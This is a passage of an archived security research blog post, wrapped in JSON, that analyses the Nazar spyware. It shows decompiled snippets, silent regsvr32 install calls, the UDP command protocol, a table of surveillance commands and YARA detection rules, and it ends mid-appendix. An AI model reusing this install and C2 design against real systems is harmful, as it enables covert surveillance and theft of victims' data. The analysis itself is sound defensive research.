{
	"id": "e5dec0f8-1c38-418c-8a3a-14a2ffec5cc0",
	"created_at": "2026-04-11T02:23:19.338309Z",
	"updated_at": "2026-04-11T02:24:15.639301Z",
	"deleted_at": null,
	"sha1_hash": "86864f605f7035b4d98342f0087a70ea42f42a7f",
	"title": "Nazar: Spirits of the Past",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 175242,
	"plain_text": "Nazar: Spirits of the Past\r\nBy itayc\r\nPublished: 2020-05-05 · Archived: 2026-04-11 02:05:33 UTC\r\nIntroduction\r\n6:22 AM 11/7/2012 conficker still on target\r\n6:18 AM 11/7/2012 checking logs - we are clean\r\n8:16 PM 7/2/2012 - BOOM!, got the callback\r\nThose were some of the words that the Equation Group (NSA) operators left in the records documenting their\r\nattacks against target systems, and which were later leaked by the Shadow Brokers. The plethora of information\r\nexposed in the fifth and last leak by the Shadow Brokers, called “Lost in Translation”, and the following\r\nconsequences that took shape in WannaCry and NotPetya among other things, makes this a changing point in the\r\ngame of cyber security as we know it.\r\nRecently, security researcher Juan Andres Guerrero-Saade revealed a previously misidentified and unknown threat\r\ngroup, called Nazar, which was part of the last leak by the Shadow Brokers. In this research, we will expand upon\r\nthe analysis done by Juan and another which was written by Maciej Kotowicz, and will provide an in-depth\r\nanalysis of each of the Nazar components. But the real question is, do those new revelations add a missing piece\r\nto the puzzle, or do they show us how much of the puzzle we are missing?\r\nPrior Knowledge\r\nWhile the “Lost in Translation” leak by the Shadow Brokers brought infamous exploits such as EternalBlue into\r\nthe limelight, it contained many more valuable components that showed some of the possible precautions taken by\r\nthe Equation Group operators before launching an attack.\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 1 of 28\n\nA screenshot from the original post by the Shadow Brokers\r\nFor example, among the leaked files was one called “drv_list.txt“, which included a list of driver names and\r\ncorresponding remarks that were sent back to the operators if the drivers were found on the target system.\r\nNaturally, the list contained many drivers that could detect the presence of an anti-virus product or a security\r\nsolution (ourselves included):\r\nDrivers mentioned in “drv_list.txt”\r\nBut even more curious were the names of malicious drivers in this list, which if found could indicate that the\r\ntarget system has already been compromised by another attacker, and would then warn the operators to “pull\r\nback”. Another pivotal component in the Equation Group’s arsenal that is in charge of such checks is called\r\n“Territorial Dispute”, or “TeDi”.\r\nTerritorial Dispute, as seen in the leaked sources\r\nSimilar to a scan conducted by a security product, “TeDi” consists of 45 signatures that are used to search the\r\ntarget system for registry keys or filenames associated with other threat groups. But we can assume that the end\r\npurpose in this case, unlike that of a security scan, is to make sure that Equation Group’s operations are not\r\ndisrupted and that their own tools are not detected by other adversaries (or “other peeps”, as they are called in\r\n“TeDi”) monitoring the same system.\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 2 of 28\n\nCode snippet from TeDi’s leaked sources\r\nIn certain cases, this also guarantees that the Equation Group themselves do not disrupt the ongoing operations of\r\n“friendly” threat groups, and do not attack the same target.\r\nExtensive research work has been done by CrySys Labs in 2018 to try and map each of the 45 signatures to the\r\nrespective threat group it is meant to detect since no names were included in “TeDi” itself.\r\nExamples for signatures found on TeDi’s leaked sources\r\nDespite the relatively scarce amount of information it contains, security researchers often revisit “TeDi” in an\r\nattempt to get a better understanding of threat groups that the Equation Group had visibility to back then, as some\r\nof which are still (to this day) unknown to the public.\r\nSecurity researcher Juan Andres Guerrero-Saade has shown that the 37th signature in “TeDi” which looks for a\r\nfile called “Godown.dll” points to what might be an Iranian threat group he dubbed “Nazar”, rather than a Chinese\r\none as initially thought in the CrySys Lab report.\r\nSIG37, the signature to detect “Nazar” by looking for “godown.dll”\r\nThe beauty of the “TeDi” project is perhaps in its minimalism: the small number of signatures it contained gave\r\nthe Equation Group the capability of detecting the activity of notorious threat groups that have eluded detection\r\nand managed to remain in the shadows for years: Turla, Duqu, Dark Hotel, and the list goes on. This is the result\r\nof what we can only estimate as years of intelligence and research work on the Equation Group’s part. Equipped\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 3 of 28\n\nwith this knowledge we set out to find more about the mysterious newly discovered player included in this\r\nwatchlist: Nazar.\r\nExecution Flow\r\nNazar’s activity is believed to have started somewhere around 2008, meaning that the group was active for at least\r\nfour years, as the latest samples were created in 2012.\r\nThe CrySys Labs report pointed to a file possibly related to the 37th signature, which turned out to be an anti-virus\r\nsignature database from 2015 that detected this unique Nazar artifact, “Godown.dll”. Surprisingly, the same\r\nsignature contained names of the other artifacts that we have seen being used by the Nazar malware (and will\r\nexplain in detail in the following sections), meaning that some security companies were already fully aware of this\r\nmalicious activity back then, prior to the “TeDi” leak:\r\nAn anti-virus signature that was detecting Nazar\r\nThe initial binary that is executed in Nazar’s flow is gpUpdates.exe . It is a Self-Extracting Archive (SFX)\r\ncreated by a program called “Zip 2 Secure EXE“. Upon execution, gpUpdates writes three files to disk:\r\nData.bin , info , and Distribute.exe . Then, gpUpdates.exe will start Distribute.exe which operates as\r\nan installing component.\r\nDistribute.exe\r\nAt the start, Distribute.exe will read the other two files that were dropped by gpUpdates : info and\r\nData.bin . The Data.bin file is a binary blob that contains multiple PE files that are concatenated in a\r\nsequence. The info file is a very small file that contains a simple struct with the lengths of the PE files in\r\nData.bin . Distribute.exe will read Data.bin as a stream, file by file, in the order of file lengths as shown in\r\ninfo .\r\nThe following table shows the files concatenated in Data.bin against the lengths written in info .\r\nData.bin (sequence of files) info (lengths)\r\nsvchost.exe 213504\r\nFilesystem.dll 262219\r\nViewScreen.dll 196608\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 4 of 28\n\nData.bin (sequence of files) info (lengths)\r\nlame_enc.dll 162304\r\nhodll.dll 57344\r\nGodown.dll 32768\r\nAfter the aforementioned files are dropped to the disk, Distribute.exe will register 3 of the DLL files to the\r\nregistry, by using regsvr32 .\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nShellExecuteA(0, \"open\", \"regsvr32.exe\", \"Godown.dll -s\", 0, 0);\r\nShellExecuteA(0, \"open\", \"regsvr32.exe\", \"ViewScreen.dll -s\", 0, 0);\r\nShellExecuteA(0, \"open\", \"regsvr32.exe\", \"Filesystem.dll -s\", 0, 0);\r\nShellExecuteA(0, \"open\", \"regsvr32.exe\", \"Godown.dll -s\", 0, 0); ShellExecuteA(0, \"open\", \"regsvr32.exe\",\r\n\"ViewScreen.dll -s\", 0, 0); ShellExecuteA(0, \"open\", \"regsvr32.exe\", \"Filesystem.dll -s\", 0, 0);\r\nShellExecuteA(0, \"open\", \"regsvr32.exe\", \"Godown.dll -s\", 0, 0);\r\nShellExecuteA(0, \"open\", \"regsvr32.exe\", \"ViewScreen.dll -s\", 0, 0);\r\nShellExecuteA(0, \"open\", \"regsvr32.exe\", \"Filesystem.dll -s\", 0, 0);\r\nAfterwards, it uses CreateServiceA to add svchost.exe as a service named “EYService”, and it will then start\r\nthe service and exit. This service, as we will explain soon, is the core component in the flow and is responsible for\r\nprocessing the commands sent by the attacker.\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 5 of 28\n\nNazar’s execution flow\r\nsvchost.exe / EYService\r\nThis service is the main component in the attack, and it orchestrates the entire modules dropped and loaded by\r\nNazar. In a sense, the EYService is only a marionette controlled by a puppeteer that sends commands to it. The\r\ncommunication protocol will be thoroughly explained in later parts of this blog post. As commonly seen in RAT-like components, this service mainly contains a list of supported commands, and each of these commands is\r\nassigned with a function to handle it upon a request from the attacker. The full list of commands is listed below.\r\nAs other components in Nazar, this module also does not demonstrate novel techniques or high-quality of written\r\ncode. In fact, this module, like the others, is mostly based on open-source libraries that were commonly available\r\nat the time. To manage traffic and sniff packets, Nazar uses Microolap‘s Packet Sniffer SDK. To record the\r\nvictim’s microphone it uses “Lame” Mp3 encoding library. For keylogging it uses KeyDLL3. BMGLib is used to\r\ntake screenshots, and even for shutting down the computer, it uses an open-source project – The ShutDown Alarm.\r\nCommunication\r\nWhen analyzing the networking component, the main thing we looked for was the IP of the command and control,\r\nsince this could open up new paths, and perhaps recent attacks and samples. Alas, leaving no stone unturned, we\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 6 of 28\n\ncould not find such an IP, and it made sense due to how Nazar is communicating.\r\nUpon execution of the service, it begins with setting up the packet sniffing. This is done by using the Packet\r\nSniffer SDK, in pretty much a textbook way. The main thread gets an outward-facing network adapter and uses\r\nBPF to make sure only UDP packets are forwarded to the handler.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nDWORD __stdcall main_thread(LPVOID lpThreadParameter)\r\n{\r\nHANDLE hMgr; // edi\r\nHANDLE hCfg; // esi\r\nHANDLE hFtr; // edi\r\nhMgr = MgrCreate();\r\nMgrInitialize(hMgr);\r\nhCfg = MgrGetFirstAdapterCfg(hMgr);\r\ndo\r\n{\r\nif ( !AdpCfgGetAccessibleState(hCfg) )\r\nbreak;\r\nhCfg = MgrGetNextAdapterCfg(hMgr, hCfg);\r\n}\r\nwhile ( hCfg );\r\nADP_struct = AdpCreate();\r\nAdpSetConfig(ADP_struct, hCfg);\r\nif ( !AdpOpenAdapter(ADP_struct) )\r\n{\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 7 of 28\n\nAdpGetConnectStatus(ADP_struct);\r\nMaxPacketSize = AdpCfgGetMaxPacketSize(hCfg);\r\nadapter_ip = AdpCfgGetIpA_wrapper(hCfg, 0);\r\nAdpCfgGetMACAddress(hCfg, \u0026mac_address, 6);\r\nhFtr = BpfCreate();\r\nBpfAddCmd(hFtr, BPF_LD_B_ABS, 23u); // Get Protocol field value\r\nBpfAddJmp(hFtr, BPF_JMP_JEQ, IPPROTO_UDP, 0, 1);// Protocol == UDP\r\nBpfAddCmd(hFtr, BPF_RET, 0xFFFFFFFF);\r\nBpfAddCmd(hFtr, BPF_RET, 0);\r\nAdpSetUserFilter(ADP_struct, hFtr);\r\nAdpSetUserFilterActive(ADP_struct, 1);\r\nAdpSetOnPacketRecv(ADP_struct, on_packet_recv_handler, 0);\r\nAdpSetMacFilter(ADP_struct, 2);\r\nwhile ( 1 )\r\n{\r\nif ( stop_and_ping == 1 )\r\n{\r\nadapter_ip = AdpCfgGetIpA_wrapper(hCfg, 0);\r\nconnection_method(2);\r\nstop_and_ping = 0;\r\n}\r\nSleep(1000u);\r\n}\r\n}\r\nreturn 0;\r\n}\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 8 of 28\n\nDWORD __stdcall main_thread(LPVOID lpThreadParameter) { HANDLE hMgr; // edi HANDLE hCfg; // esi\r\nHANDLE hFtr; // edi hMgr = MgrCreate(); MgrInitialize(hMgr); hCfg = MgrGetFirstAdapterCfg(hMgr); do { if (\r\n!AdpCfgGetAccessibleState(hCfg) ) break; hCfg = MgrGetNextAdapterCfg(hMgr, hCfg); } while ( hCfg );\r\nADP_struct = AdpCreate(); AdpSetConfig(ADP_struct, hCfg); if ( !AdpOpenAdapter(ADP_struct) ) {\r\nAdpGetConnectStatus(ADP_struct); MaxPacketSize = AdpCfgGetMaxPacketSize(hCfg); adapter_ip =\r\nAdpCfgGetIpA_wrapper(hCfg, 0); AdpCfgGetMACAddress(hCfg, \u0026mac_address, 6); hFtr = BpfCreate();\r\nBpfAddCmd(hFtr, BPF_LD_B_ABS, 23u); // Get Protocol field value BpfAddJmp(hFtr, BPF_JMP_JEQ,\r\nIPPROTO_UDP, 0, 1);// Protocol == UDP BpfAddCmd(hFtr, BPF_RET, 0xFFFFFFFF); BpfAddCmd(hFtr,\r\nBPF_RET, 0); AdpSetUserFilter(ADP_struct, hFtr); AdpSetUserFilterActive(ADP_struct, 1);\r\nAdpSetOnPacketRecv(ADP_struct, on_packet_recv_handler, 0); AdpSetMacFilter(ADP_struct, 2); while ( 1 ) { if\r\n( stop_and_ping == 1 ) { adapter_ip = AdpCfgGetIpA_wrapper(hCfg, 0); connection_method(2); stop_and_ping =\r\n0; } Sleep(1000u); } } return 0; }\r\nDWORD __stdcall main_thread(LPVOID lpThreadParameter)\r\n{\r\n HANDLE hMgr; // edi\r\n HANDLE hCfg; // esi\r\n HANDLE hFtr; // edi\r\n hMgr = MgrCreate();\r\n MgrInitialize(hMgr);\r\n hCfg = MgrGetFirstAdapterCfg(hMgr);\r\n do\r\n {\r\n if ( !AdpCfgGetAccessibleState(hCfg) )\r\n break;\r\n hCfg = MgrGetNextAdapterCfg(hMgr, hCfg);\r\n }\r\n while ( hCfg );\r\n ADP_struct = AdpCreate();\r\n AdpSetConfig(ADP_struct, hCfg);\r\n if ( !AdpOpenAdapter(ADP_struct) )\r\n {\r\n AdpGetConnectStatus(ADP_struct);\r\n MaxPacketSize = AdpCfgGetMaxPacketSize(hCfg);\r\n adapter_ip = AdpCfgGetIpA_wrapper(hCfg, 0);\r\n AdpCfgGetMACAddress(hCfg, \u0026mac_address, 6);\r\n hFtr = BpfCreate();\r\n BpfAddCmd(hFtr, BPF_LD_B_ABS, 23u); // Get Protocol field value\r\n BpfAddJmp(hFtr, BPF_JMP_JEQ, IPPROTO_UDP, 0, 1);// Protocol == UDP\r\n BpfAddCmd(hFtr, BPF_RET, 0xFFFFFFFF);\r\n BpfAddCmd(hFtr, BPF_RET, 0);\r\n AdpSetUserFilter(ADP_struct, hFtr);\r\n AdpSetUserFilterActive(ADP_struct, 1);\r\n AdpSetOnPacketRecv(ADP_struct, on_packet_recv_handler, 0);\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 9 of 28\n\nAdpSetMacFilter(ADP_struct, 2);\r\n while ( 1 )\r\n {\r\n if ( stop_and_ping == 1 )\r\n {\r\n adapter_ip = AdpCfgGetIpA_wrapper(hCfg, 0);\r\n connection_method(2);\r\n stop_and_ping = 0;\r\n }\r\n Sleep(1000u);\r\n }\r\n }\r\n return 0;\r\n}\r\nWhenever a UDP packet arrives, its source IP is recorded to be used in the next response, whether or not there will\r\nbe a response. Then, the packet’s destination port will be checked, and in case it is 1234 the UDP data will be\r\nforwarded to the command dispatcher.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nint __cdecl commandMethodsWrapper(udp_t *udp_packet, int zero, char *src_ip, int ip_id)\r\n{\r\nint length; // edi\r\nlength = HIBYTE(udp_packet-\u003elength) - 8;\r\nntohs(udp_packet-\u003esrc_port);\r\nif ( ntohs(udp_packet-\u003edst_port) != 1234 )\r\nreturn 0;\r\ncommandDispatcher(\u0026udp_packet[1], src_ip, ip_id, length);\r\nreturn 1;\r\n}\r\nint __cdecl commandMethodsWrapper(udp_t *udp_packet, int zero, char *src_ip, int ip_id) { int length; // edi\r\nlength = HIBYTE(udp_packet-\u003elength) - 8; ntohs(udp_packet-\u003esrc_port); if ( ntohs(udp_packet-\u003edst_port) !=\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 10 of 28\n\n1234 ) return 0; commandDispatcher(\u0026udp_packet[1], src_ip, ip_id, length); return 1; }\r\nint __cdecl commandMethodsWrapper(udp_t *udp_packet, int zero, char *src_ip, int ip_id)\r\n{\r\n int length; // edi\r\n length = HIBYTE(udp_packet-\u003elength) - 8;\r\n ntohs(udp_packet-\u003esrc_port);\r\n if ( ntohs(udp_packet-\u003edst_port) != 1234 )\r\n return 0;\r\n commandDispatcher(\u0026udp_packet[1], src_ip, ip_id, length);\r\n return 1;\r\n}\r\nTypes of responses\r\nEach response will have its packet built from scratch, so it could be sent using PSSDK’s send methods :\r\nAdpAsyncSend/AdpSyncSend\r\nThere are 3 types of responses:\r\nSend an ACK: With destination port 4000 and payload 101;0000\r\nSend computer information: With destination port 4000 and payload 100;\u003cComputer Name\u003e;\u003cOS name\u003e\r\nSend a file: The content will be sent as UDP data, followed by another packet with ---\u003csize_of_file\u003e\r\nThe UDP destination port will be the little-endian value of the IP identification field in the request\r\nmessage. For example, If the server sent a packet (to destination port 1234) with identification 0x3456\r\n,the malware will send its response with destination port 0x5634\r\nTo make the options clearer, and to demonstrate how Nazar communicates, we have created a python script that\r\ncan “play” the server controlled by the attacker, and communicate with the victim. The script is available in\r\nAppendix C.\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 11 of 28\n\nA script we created to demonstrate how the server would communicate with Nazar\r\nSupported Commands\r\nAs we mentioned earlier, svchost.exe , or the service named EYService , contains a list of supported\r\ncommands. We analyzed two versions of the RAT and found slight differences. The entire list of supported\r\ncommands, in addition to our analysis notes, are presented in the table below.\r\nCommand\r\nID\r\nDescription\r\n311\r\nEnable keylogger by loading the ‘hodll.dll’ library to memory and manually\r\nimporting the ‘installhook’ function. The keystrokes are saved with the window\r\nname to ‘report.txt’. The written content is then sent to the server. The keylogger\r\nis based on common open-source libraries called “KeyDLL3” (by Anoop\r\nThomas) and “KeyBoard Hooks” (by H. Joseph). Command 312 will disable the\r\nkeylogger.\r\n139 Shutdown the machine. The command is interacting with\r\nthe  Godown.dll  component by spawning it based on its RCLSID and RIID.\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 12 of 28\n\nCommand\r\nID\r\nDescription\r\nThe  Godown  module was probably based on an open-source implementation\r\ncalled The ShutDown Alarm.\r\n189\r\nStart screen capturing. The function calls the benign  ViewScreen.dll  and\r\ninstructs it to save screenshots in a PNG file named  z.png . The file is then sent\r\nto the server. The module is based on a known open-source project named\r\n“BMGLib“, written by M. Scott Heiman. Command 313 will disable the screen\r\ncapturing.\r\n119\r\nResponsible for recording audio using the victim’s Microphone. The recording is\r\nsaved to  music.mp3  and sent to the server. The implementation is based on\r\nan open-source project which uses a known open source library called “LAME\r\nMP3“. Command 315 will disable the voice recording.\r\n199\r\nList all drives in the PC (C:\\, D:\\, …) and save it to  Drives.txt . The file is then\r\nsent to the server. This functionality exists as-is in  Filesystem.dll  but the\r\nnewer variant of  svchost.exe  does not use the DLL, even though it is still\r\ndropped to the machine.\r\n200\r\nList all the files and folders in the system and saves it to  Files.txt . The files\r\nand folder are separated with  ;File;  or  ;Folder; . This functionality exists\r\nas-is in  Filesystem.dll  but the newer variant of  svchost.exe  does not use\r\nthe DLL, even though it is still dropped to the machine.\r\n201 Sends file content to the server.\r\n209 Remove a file from the machine.\r\n499\r\nList program by enumerating the keys found in the following registry\r\npath:  Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall . The program\r\nnames are then saved to a file called  Programs.txt  and sent to the server.\r\n599\r\nList all the devices on the machine and save it to a file named ‘Devices.txt’\r\nwhich is then sent to the server. The devices are separated with either ‘;Root;’ or\r\n‘;Child;’.\r\n999 Sends  101;0000  back to the server in port  4000 .\r\n555\r\nSends Computer information:  100;Computer Name; OS Name  back to the server\r\nin port  4000 .\r\n315 Disable voice recording.\r\n312 Disable keylogging.\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 13 of 28\n\nCommand\r\nID\r\nDescription\r\n313 Disable screen capturing.\r\n666\r\nPretty much NOP. Will set a flag that is also set by  119  and  189  and will be\r\nunset when sending a file. However, it is never checked.\r\n211\r\nRegisters  Godown.dll  using  regsvr32  This command was included\r\nin  svchost.exe  versions from 2010 but was then removed, and the module\r\nregistration moved to  Distrbute.exe\r\n212\r\nRegisters  ViewScreen.dll  using  regsvr32  This command was included\r\nin  svchost.exe  versions from 2010 but was then removed, and the module\r\nregistration moved to  Distrbute.exe\r\n213\r\nRegisters  Filesystem.dll  using  regsvr32  This command was included\r\nin  svchost.exe  versions from 2010 but was then removed, and the module\r\nregistration moved to  Distrbute.exe\r\nGodown.dll\r\nGodown.dll is the DLL which is in the spotlight of SIG37, and the one that started this manhunt after the\r\nunknown malware. Before it was caught by law-abiding security analysts, one could imagine Godown.dll to be\r\nthe mastermind behind this whole operation, the component to control them all, some hidden gem, or an unseen\r\nrose. In reality, Godown.dll is a tiny DLL with one and only goal – to shut down the computer. Believe us, we\r\ntried hard to find any hidden or mysterious functionality inside the binary, but nothing was there, except a\r\nshutdown command. The reasons to take 5 lines of C code and place them in a DLL, put it in Data.bin , drop it\r\nto the disk, register it as a COM DLL using regsvr32 and then call it indirectly using GUID – are beyond our\r\nunderstanding. But well, it was good enough of a lead to revealing Nazar, and for that, we should be thankful.\r\nFilesystem.dll\r\nOut of all the modules used in this attack, Filesystem.dll might be the only one whose code was actually\r\nwritten by the attackers themselves. The purpose of this module is to enumerate drives, folders and files on the\r\ninfected system and write the final results to two text files: Drives.txt and Files.txt .\r\nWe were able to get our hands on two versions of this module that were created a year apart, both of which\r\nincluded PDB paths that mentioned a folder with the Persian name Khzer (or خضر(:\r\nC:\\\\khzer\\\\DLLs\\\\DLL's Source\\\\Filesystem\\\\Debug\\\\Filesystem.pdb\r\nD:\\\\Khzer\\\\Client\\\\DLL's Source\\\\Filesystem\\\\Debug\\\\Filesystem.pdb\r\nUpon closer inspection, there are some differences between the two paths: One starts with the C:\\\\ partition\r\nwhile the other starts with D:\\\\ , one uses Khzer (uppercase) while the other uses khzer (lowercase), and so\r\non. This might indicate that the two versions of the module were not compiled in the same environment, and is\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 14 of 28\n\nfurther strengthened by some of the included headers’ paths, which show that Visual Studio was installed in two\r\ndifferent locations:\r\nBut these are not the only differences between the two versions: while the Filesystem.dll module was dropped\r\nby all the known variants of gpUpdates.exe , it was not always used in the same manner.\r\nFor example, versions of svchost.exe dating back to 2010 have three commands that have since been omitted:\r\n“211”, “212”, and “213”. Those commands allow svchost.exe to register the dropped DLL modules using\r\nregsvr32 , a functionality that was later migrated to Distribute.exe (as described in the Execution Flow\r\nsection above).\r\nAn omitted command presented in svchost.exe, as can be seen in Cutter\r\nThen, when a command is received by the C2 to collect the files and drives on the system, the Filesystem.dll\r\nmodule is called after it was registered:\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 15 of 28\n\nRegistering Filesystem.dll, as can be seen in Cutter\r\nOn the other hand, a more recent version of svchost.exe that was created in 2012 replicates the file and drive\r\nlookup functionalities found in Filesystem.dll when receiving the “199” and “200” commands from the C2, and\r\nperforms the search itself. Therefore, even though it is still dropped in this case, it appears that the Filesystem.dll\r\nmodule is not used in the newer versions of Nazar:\r\nThe same functionality presented in both files as can be seen in the disassembly from Cutter\r\nhodll.dll\r\nThe hodll.dll module is responsible for recording the user’s keystrokes. It is done, as most keyloggers do, by\r\nsetting a Windows hook for keyboard inputs. While there are many implementations of keyloggers available, we\r\nbelieve that this implementation is based on one or more open-source projects. Specifically, we believe that the\r\ncode was taken from common open-source libraries called “KeyDLL3” (by Anoop Thomas) and “KeyBoard\r\nHooks” (by H. Joseph) or by a fork of these projects, as many are available. In fact, the samples of hodll.dll\r\nwe put our hands on, looked like they were built from different layers of open source projects. In a way, it looked\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 16 of 28\n\nlike someone copied code from the internet, and then deleted it partially, and took other code, and deleted it as\r\nwell, and so on. The final result contained evolutionary pieces from multiple layers of code.\r\nViewScreen.dll\r\nThis DLL is based on a known open-source project named “BMGLib” and it is used to take screenshots of the\r\nvictim’s computer. No major changes, if any, were added to the original source, and this is yet another example of\r\nhow the Nazar malware uses an entire library just for a small task.\r\nConclusion\r\nIn this article, we tried to gather all the information we learned about Nazar since its recent exposure. We dived\r\ndeep into each and every one of the components and tried to solve as many mysteries as possible. The leaked\r\ninformation by the Shadow Brokers taught us that the NSA knew about Nazar for many years, and thanks to other\r\nresearchers, the community was able to strikethrough another unknown malware family from the list of signatures\r\nin “TeDi”.\r\nMany of the signatures in “TeDi” described advanced and novel malware families, but this does not appear to be\r\nthe case with Nazar. As we have shown in the article, the quality of the code, as well as the heavy usage of open\r\nsource libraries, does not match the profile of a shrewd threat actor. And although we tried to cover everything,\r\nthere are still many unanswered questions surrounding those discoveries: What happened to the Nazar group, did\r\nthey evolve into other groups that are nowadays known under different names? Are they still active? Are there\r\nmore samples out there? With those questions and others on our minds, we cannot help but leave this open-ended.\r\nAppendix\r\nAppendix A: Yara Rules\r\nIn his blog post, Juan published Yara rules to ease detection. The rules are well written and cover the different\r\ncomponents. We want to share some rules we created during our analysis, to add to the existing rules.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nrule apt_nazar_svchost_commands\r\n{\r\nmeta:\r\ndescription = \"Detect Nazar's svchost based on supported commands\"\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 17 of 28\n\nauthor = \"Itay Cohen\"\r\ndate = \"2020-04-26\"\r\nreference = \"\u003chttps://www.epicturla.com/blog/the-lost-nazar\u003e\"\r\nhash = \"2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6\"\r\nhash = \"be624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728\"\r\nstrings:\r\n$str1 = { 33 31 34 00 36 36 36 00 33 31 33 00 }\r\n$str2 = { 33 31 32 00 33 31 35 00 35 35 35 00 }\r\n$str3 = { 39 39 39 00 35 39 39 00 34 39 39 00 }\r\n$str4 = { 32 30 39 00 32 30 31 00 32 30 30 00 }\r\n$str5 = { 31 39 39 00 31 31 39 00 31 38 39 00 31 33 39 00 33 31 31 00 }\r\ncondition:\r\n4 of them\r\n}\r\nrule apt_nazar_component_guids\r\n{\r\nmeta:\r\ndescription = \"Detect Nazar Components by COM Objects' GUID\"\r\nauthor = \"Itay Cohen\"\r\ndate = \"2020-04-27\"\r\nreference = \"\u003chttps://www.epicturla.com/blog/the-lost-nazar\u003e\"\r\nhash = \"1110c3e34b6bbaadc5082fabbdd69f492f3b1480724b879a3df0035ff487fd6f\"\r\nhash = \"1afe00b54856628d760b711534779da16c69f542ddc1bb835816aa92ed556390\"\r\nhash = \"2caedd0b2ea45761332a530327f74ca5b1a71301270d1e2e670b7fa34b6f338e\"\r\nhash = \"2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6\"\r\nhash = \"460eba344823766fe7c8f13b647b4d5d979ce4041dd5cb4a6d538783d96b2ef8\"\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 18 of 28\n\nhash = \"4d0ab3951df93589a874192569cac88f7107f595600e274f52e2b75f68593bca\"\r\nhash = \"75e4d73252c753cd8e177820eb261cd72fecd7360cc8ec3feeab7bd129c01ff6\"\r\nhash = \"8fb9a22b20a338d90c7ceb9424d079a61ca7ccb7f78ffb7d74d2f403ae9fbeec\"\r\nhash = \"967ac245e8429e3b725463a5c4c42fbdf98385ee6f25254e48b9492df21f2d0b\"\r\nhash = \"be624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728\"\r\nhash = \"d34a996826ea5a028f5b4713c797247913f036ca0063cc4c18d8b04736fa0b65\"\r\nhash = \"d9801b4da1dbc5264e83029abb93e800d3c9971c650ecc2df5f85bcc10c7bd61\"\r\nhash = \"eb705459c2b37fba5747c73ce4870497aa1d4de22c97aaea4af38cdc899b51d3\"\r\nstrings:\r\n$guid1_godown = { 98 B3 E5 F6 DF E3 6B 49 A2 AD C2 0F EA 30 DB FE } // Godown.dll IID\r\n$guid2_godown = { 31 4B CB DB B8 21 0F 4A BC 69 0C 3C E3 B6 6D 00 } // Godown.dll CLSID\r\n$guid3_godown = { AF 94 4E B6 6B D5 B4 48 B1 78 AF 07 23 E7 2A B5 } // probably Godown\r\n$guid4_filesystem = { 79 27 AB 37 34 F2 9D 4D B3 FB 59 A3 FA CB 8D 60 } // Filesystem.dll CLSID\r\n$guid6_filesystem = { 2D A1 2B 77 62 8A D3 4D B3 E8 92 DA 70 2E 6F 3D } // Filesystem.dll TypeLib IID\r\n$guid5_filesystem = { AB D3 13 CF 1C 6A E8 4A A3 74 DE D5 15 5D 6A 88 } // Filesystem.dll\r\ncondition:\r\nany of them\r\n}\r\nrule apt_nazar_svchost_commands { meta: description = \"Detect Nazar's svchost based on supported commands\"\r\nauthor = \"Itay Cohen\" date = \"2020-04-26\" reference = \"\u003chttps://www.epicturla.com/blog/the-lost-nazar\u003e\" hash =\r\n\"2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6\" hash =\r\n\"be624acab7dfe6282bbb32b41b10a98b6189ab3a8d9520e7447214a7e5c27728\" strings: $str1 = { 33 31 34 00 36\r\n36 36 00 33 31 33 00 } $str2 = { 33 31 32 00 33 31 35 00 35 35 35 00 } $str3 = { 39 39 39 00 35 39 39 00 34 39\r\n39 00 } $str4 = { 32 30 39 00 32 30 31 00 32 30 30 00 } $str5 = { 31 39 39 00 31 31 39 00 31 38 39 00 31 33 39\r\n00 33 31 31 00 } condition: 4 of them } rule apt_nazar_component_guids { meta: description = \"Detect Nazar\r\nComponents by COM Objects' GUID\" author = \"Itay Cohen\" date = \"2020-04-27\" reference = \"\r\n\u003chttps://www.epicturla.com/blog/the-lost-nazar\u003e\" hash =\r\n\"1110c3e34b6bbaadc5082fabbdd69f492f3b1480724b879a3df0035ff487fd6f\" hash =\r\n\"1afe00b54856628d760b711534779da16c69f542ddc1bb835816aa92ed556390\" hash =\r\n\"2caedd0b2ea45761332a530327f74ca5b1a71301270d1e2e670b7fa34b6f338e\" hash =\r\n\"2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6\" hash =\r\nhttps://research.checkpoint.com/2020/nazar-spirits-of-the-past/\r\nPage 19 of 